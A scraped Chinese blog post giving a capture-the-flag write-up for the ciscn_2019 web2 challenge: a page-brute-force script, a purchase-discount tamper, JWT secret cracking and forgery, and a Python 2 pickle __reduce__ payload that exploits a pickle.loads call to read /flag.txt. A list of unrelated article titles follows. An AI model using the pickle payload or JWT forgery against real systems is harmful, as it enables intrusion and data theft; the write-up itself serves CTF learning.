当前位置：首页 > news >正文

CTF ciscn_2019_web_northern_china_day1_web2

news 2025/11/2 16:18:44

ciscn_2019_web_northern_china_day1_web2

BEGIN

拿到题目，先看看
在这里插入图片描述
这里发现一个很像提示的东西，然后发现下面是一堆小电视商品，有lv等级和金钱，所以这题的入口可能就是再lv6和这个资金募集上
然后点击下next，看看页数的参数，然后爆破一下（注意看看lv信息是怎么显示的，这里是图片名

爆破lv6

import requestsurl = 'http://192.168.163.128:8083/shop?page='for i in range(1, 1000):r = requests.get(url + str(i))if 'lv6.png' in r.text:print(i)break

爆破出结果是181
然后就购买但是金额不够（记得注册登录
然后看到有折扣，就抓包试试能不能改

抓包修改折扣

change discount
修改完后，发现返回一个Location（主要也没别的信息了（毕竟也不是404，502啥的
然后就访问url\blg_m4mber
然后⬇️
在这里插入图片描述

JWT伪造

怎么越权呢，先抓个包
然后发现有JWT::Json web token (JWT)
直达➡️JWT伪造

在这里插入图片描述
然后就复现一下JWT伪造，把secret key爆破出来
把JWT换成自己的

然后到https://jwt.io/生成一下（先放原有的然后修改user和secret key，就ok了)
生成伪造的JWT

这里还卡了一下，因为我是把JWT用burp传的，然后看不到提示信息(burp raw不支持中文 😢

康康wp，F12开始操作

在这里插入图片描述

然后下载源码然后又卡住了

代码审计

漏洞：pickle.loads unserialize执行魔术方法造成rce

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllibclass AdminHandler(BaseHandler):@tornado.web.authenticateddef get(self, *args, **kwargs):if self.current_user == "admin":return self.render('form.html', res='This is Black Technology!', member=0)else:return self.render('no_ass.html')@tornado.web.authenticateddef post(self, *args, **kwargs):try:become = self.get_argument('become')p = pickle.loads(urllib.unquote(become))return self.render('form.html', res=p, member=1)except:return self.render('form.html', res='This is Black Technology!', member=0)

payload

注意到，urllib.unquote()是python2的用法，python3中使用urllib.parse.unquote()

#!/usr/bin/env python2.7
import pickle
import urllibclass payload(object):def __reduce__(self):return (eval, ("open('/flag.txt','r').read()",))a = pickle.dumps(payload())
a = urllib.quote(a)
print a

然后通过become传参

还好不是只能在源码里看，一开始真没在raw中找到，然后就render看看，毕竟都200OK了结果没看到flag 😓
卡挺久的

在这里插入图片描述

OVER

抓包+JWT+pickle反序列化RCE

CTF ciscn_2019_web_northern_china_day1_web2

ciscn_2019_web_northern_china_day1_web2

BEGIN

爆破lv6

抓包修改折扣

JWT伪造

代码审计

payload

OVER

相关文章：

CTF ciscn_2019_web_northern_china_day1_web2

linux中vim编辑器的应用实例

智慧城市交通管理中的云端多车调度与控制

分治（归并排序）

小学生为什么要学英语

企业云存储如何收费？企业云存储收费标准

一步步教你LangGraph Studio：可视化调试基于LangGraph构建的AI智能体

用SpringBoot打造先进的学科竞赛管理系统

Linux入门攻坚——34、nsswitch、pam、rsyslog和loganalyzer前端展示工具

如何在Excel中快速找出前 N 名，后 N 名

创意实现！在uni-app小程序商品详情页轮播中嵌入视频播放功能

WAF，全称Web Application Firewall，好用WAF推荐

docker中搭建nacos并将springboot项目的配置文件转移到nacos中

概率论原理

MYSQL的安装和升级

深入解析 RISC-V 递归函数的栈使用：以阶乘函数为例

【保研纪念】计算机保研经验贴——南大cs、复旦cs、中南cs

TopOn对话游戏魔客：2024移动游戏广告应如何突破？

Chainlit集成LlamaIndex实现知识库高级检索（BM25全文检索器）

Dubbo入门案例

idea大量爆红问题解决

iOS 26 携众系统重磅更新，但“苹果智能”仍与国行无缘

边缘计算医疗风险自查APP开发方案

FastAPI 教程：从入门到实践

系统设计 --- MongoDB亿级数据查询优化策略

【单片机期末】单片机系统设计

Robots.txt 文件

CRMEB 框架中 PHP 上传扩展开发：涵盖本地上传及阿里云 OSS、腾讯云 COS、七牛云

06 Deep learning神经网络编程基础激活函数 --吴恩达

网站指纹识别